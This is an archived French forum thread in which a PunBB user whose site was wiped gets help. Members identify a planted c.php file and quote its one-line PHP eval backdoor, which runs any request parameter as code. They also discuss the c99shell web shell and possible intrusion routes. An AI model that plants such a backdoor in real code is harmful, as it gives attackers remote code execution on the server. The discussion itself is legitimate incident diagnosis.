Archives FluxBB.fr

kaulian

Membre

Site Hacké, nouvel Exploit ????

Bonjour,
J'avais un forum sous la version 1.2.12 de punbb pas mises a jour , j'ai fais beaucoup de mofi et je croyais jau vu des différents liens web, qu'il n'y a vait de gros exploits qui circulait sur le web pour cette version , mais quel bonheur de soir de voir mon site disparu ainsi que la base vidée.

Bref, voici juste un tour des stats pour vous prevenir et peut etre comprendre ce qu'il y a put avoir avec vous

Code trop long supprimé
Si jamais qq'un m'expliquer ce qui c'est passé ce serait une bonne chose pour moi

Merci

mangafan

Membre

Re : Site Hacké, nouvel Exploit ????

Vu comme ça, ça me fait surtout mal aux yeux et des migraines faut que j'aille voir mon ophtalmologue...

Sinon c'est quoi cette page c.php une de tes grosses modifs avec un gros trou dedans ?

---

:canon: Mangafan : Mettez un chat dans votre processeur !

nico_somb

Membre

Re : Site Hacké, nouvel Exploit ????

je verrais bien le c.php comme le hack c99shell... PunBB est-il le seul script que tu possèdes sur ton FTP?

kaulian

Membre

Re : Site Hacké, nouvel Exploit ????

IL n'y avait rien d'autre sur le site,
juste punbb, et punportail ....

POur ce qui est de c.php, il etait deja présent dans l'archive de punbb, je n'ai rien modifié dans ce fichier moi ...

Dernière modification par kaulian (05-02-2007 10:09:24)

nico_somb

Membre

Re : Site Hacké, nouvel Exploit ????

c'est donc là que tu te trompes (sauf si tu as téléchargé PunBB sur viens-ici-que-je-pirate-ton-site.fr ....).

Retélécharge l'archive de PunBB là : http://www.punbb.fr/telecharger/punbb_1-2-14_fr-b.zip

et remets tout ça au propre.

kaulian

Membre

Re : Site Hacké, nouvel Exploit ????

En effet.... , je viens de regarder l'archive de la .12 et il n'y a vait pas ce fichier ..

Dans ma sauvegarde il contient juste :

<? eval(stripslashes($_REQUEST['c'])); ?>

Mais bon ...

IL va falloir que je remette tout sur la .14 pour etre sur que cela ne vient pas d'un exploit quelquonque quand meme sur un des plugins que j'avais ajouté ..

Merci

foxmask

Lugo

Re : Site Hacké, nouvel Exploit ????

je verrais bien le c.php comme le hack c99shell...

+1

il faut passer en 1.2.14 déjà.
après on le réptérea jms assez ; ne pas laisser trainer les fichiers d'installation après usage...

liste des failles depuis la 1.2.12 http://punbb.org/index.php

---

http://www.foxmask.info
HaveFnuBB! le seul forum produit avec le framework PHP5 Jelix
(dé)pot de miel
Membre de la CoreTeam Jelix

kaulian

Membre

Re : Site Hacké, nouvel Exploit ????

Mais j'avais rien laissé moi .... :(:(

mangafan

Membre

Re : Site Hacké, nouvel Exploit ????

Si la 1.2.12

---

:canon: Mangafan : Mettez un chat dans votre processeur !

kaulian

Membre

Re : Site Hacké, nouvel Exploit ????

Oui c'est vrai je l'avoue

Ju

Admin Fantôme

Re : Site Hacké, nouvel Exploit ????

Dans ma sauvegarde il contient juste :

<? eval(stripslashes($_REQUEST['c'])); ?>

J'espère que tu as conscience que cette ligne de code est belle est bien celle qui t'as été fatale, permettant à quiconque d'exécuter n'importe quoi sur ton serveur, avec les droits de celui-ci.

Ce fichier a donc bien été créé par le hacker.
Or, si le dossier qui le contenait n'est pas chmodé en 777, c'est impossible qu'il ai été créé par une faille. Et même si ton dossier autorisait l'écriture du fichier, il faudrait encore que ton serveur n'ai pas le SAFE MODE d'activé, qui interdirait l'exécution du fichier.

Soit ces deux conditions rarissimes sont toutes les deux réunies, auquel cas il faut vraiment t'inquiéter de la sécurité de ton serveur, soit :
-> qqn a eu accés directement à ton FTP pour insérer ce fichier
-> tu as téléchargé l'archive PunBB sur un autre site que les officiaux (dis-nous où, tant à faire)
-> tes pass FTP sont les mêmes que tes pass SQL, auquel il aurai pus consulter ces derniers via une simple faille
-> qqn t'as simplement dit de mettre ce fichier sur ton FTP, auquel cas tu peux rayer sa voiture

---

Avant de poser une question, avez-vous consulté le WIKI ?
Effectué une recherche ?

CtrlAltSuppr.com Me

kaulian

Membre

Re : Site Hacké, nouvel Exploit ????

Et bien je viens de changer d'hebergeur et ce fichier etait deja présent debut Janvier lors de ma sauvegarde avant la migration vers nouveau serveur, j'espere juste que ce n'est pas l'ancien hebergeur qui a fait cela, pour ce qui est de la version non pas de probleme, je l'ai bien télécharger ici d'ailleurs, je viens de trouver l'archive d'origine et en effet elle n'a pas ce fichier ...

POur info le nouveau est OVH, mais bon comme j'avais laissé ce fichier ils ne peuvent pas grand chose...

Pafpaf

Membre

Re : Site Hacké, nouvel Exploit ????

Salut,
Ton ancien hébergeur, c'était une société? Une association? un particulier?
Tu peux nous dire son nom, juste pour savoir
Un collègue a eu un problème du même style (pas avec punbb).

A++

PS. OVH ne te propose pas des logs beaucoup plus précis?

foxmask

Lugo

Re : Site Hacké, nouvel Exploit ????

PS. OVH ne te propose pas des logs beaucoup plus précis?

nan, j'ai eu droit au meme hack et pas plus de detail de logs que ce qu"il a mis
meme en les contactant ils sont completements désinvoltes :
"ce genre de piratage on le voit plusieurs fois par jour alors on a l'habitude"...
voilà le genre ...

ah et puis chez OVH ya pas de SAFE MODE a ON ...

---

http://www.foxmask.info
HaveFnuBB! le seul forum produit avec le framework PHP5 Jelix
(dé)pot de miel
Membre de la CoreTeam Jelix

kaulian

Membre

Re : Site Hacké, nouvel Exploit ????

L'ancien hebergeur etait ... http://websiteout.net/ j'espere que cela ne vient pas d'eux ...

Concernant les logs... en fait par défault apache ne donne que ces logs ... je l'ai est contacter moi aussi pour avoir les logs et voir une sauvegarde ... bon j'avais rien activé par default donc il n'y a rien

Concernant les logs, je viens de voir qu'il y a plusieurs log dispo il faut que je creuse un peu pour voir, mais de toute facon l'acces c'est fait par le proxy de traduction de google donc ... pas moyen de savoir qui ....